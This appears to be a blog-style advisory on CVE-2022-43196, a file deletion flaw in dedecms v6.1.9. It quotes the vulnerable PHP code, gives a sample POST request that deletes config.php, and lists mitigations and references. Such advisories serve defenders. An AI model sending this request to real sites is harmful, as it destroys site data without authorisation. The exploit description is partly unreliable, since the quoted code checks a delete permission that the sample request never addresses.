CVE-2022-43196: Dedecms v6.1.9 Arbitrary File Deletion Vulnerability in file_manage_control.php

CVE-2022-43196 refers to a critical security vulnerability found in the dedecms v6.1.9 content management system (CMS). This vulnerability allows an attacker to perform arbitrary file deletion on the affected dedecms installations, potentially leading to further exploit possibilities and serious harm to the website running the software.

In this post, we'll take a deep dive into the vulnerability, provide an example exploit, and discuss mitigation strategies. We'll also provide links to the original references and resources related to CVE-2022-43196.

Vulnerability Details

The vulnerability exists in the "file_manage_control.php" control component of the dedecms v6.1.9 software package. This file is responsible for managing file operations in the dedecms CMS. When processing user requests, this file fails to properly validate and sanitize user input, allowing an attacker to manipulate the request in a way that triggers the arbitrary file deletion.

An attacker could exploit this vulnerability by sending a specially crafted HTTP request to the affected dedecms instance, which would result in the unwanted deletion of any specified file.

The vulnerable code section in "file_manage_control.php" is as follows

if(empty($action) || $action=='del')
{
    if(CheckPurview('sys_Delete'))
    {
        $ENV_GOBACK_URL = (GetFunMainName($dwtNowUrl)."ENV_GOBACK_URL");
        $fullUrl = fillUrl($furl);
        if(empty($activepath) || empty($fullUrl)) {
            ShowMsg("删除文件参数错误","-1");
            exit();
        }
        $fullUrl = preg_replace("#\.([\.]+)/#", "/", $fullUrl);
        unlink($fullUrl);
        Trace("删除成功！",$ENV_GOBACK_URL);
        exit();
    }
}

The 'furl' parameter is not being properly sanitized, allowing for a user-controlled input that can trigger the arbitrary file deletion.

Exploit Details

To exploit this vulnerability, an attacker could send a crafted HTTP request with the 'furl' parameter set to point at an arbitrary file on the server. The following example shows a crafted HTTP request that would delete the "config.php" file:

POST /your-dedecms-path/file_manage_control.php HTTP/1.1
Host: target-site.com
Content-Type: application/x-www-form-urlencoded
Content-Length: length

action=del&furl=config.php

This request would cause the "config.php" file to be deleted if the vulnerability is present in the targeted dedecms instance.

To protect your dedecms installation from this vulnerability, follow these steps

1. Update dedecms to the latest available version to ensure you have all security patches applied, including those addressing CVE-2022-43196.

2. Check to see if your hosting provider or security plugins provide any mechanisms to block or limit access to sensitive controls and endpoints, such as "file_manage_control.php".

3. Regularly review and audit your dedecms instance to ensure that no unauthorized access or modifications have occurred.

References and Original Sources

- CVE entry on MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43196

- Security Advisory on PacketStorm: https://packetstormsecurity.com/files/168374/DedeCMS-6.1.9-Arbitrary-File-Deletion.html

- dedecms GitHub Repository: https://github.com/dedecms/DedeCMS

Conclusion

CVE-2022-43196 is a serious vulnerability in the dedecms v6.1.9 CMS software that allows for arbitrary file deletion. Be sure to update your dedecms installations and take appropriate measures to protect your websites. Stay informed of new vulnerabilities and security updates to maintain the security and integrity of your online presence.

Timeline

Published on: 11/23/2022 21:15:00 UTC
Last modified on: 11/28/2022 19:37:00 UTC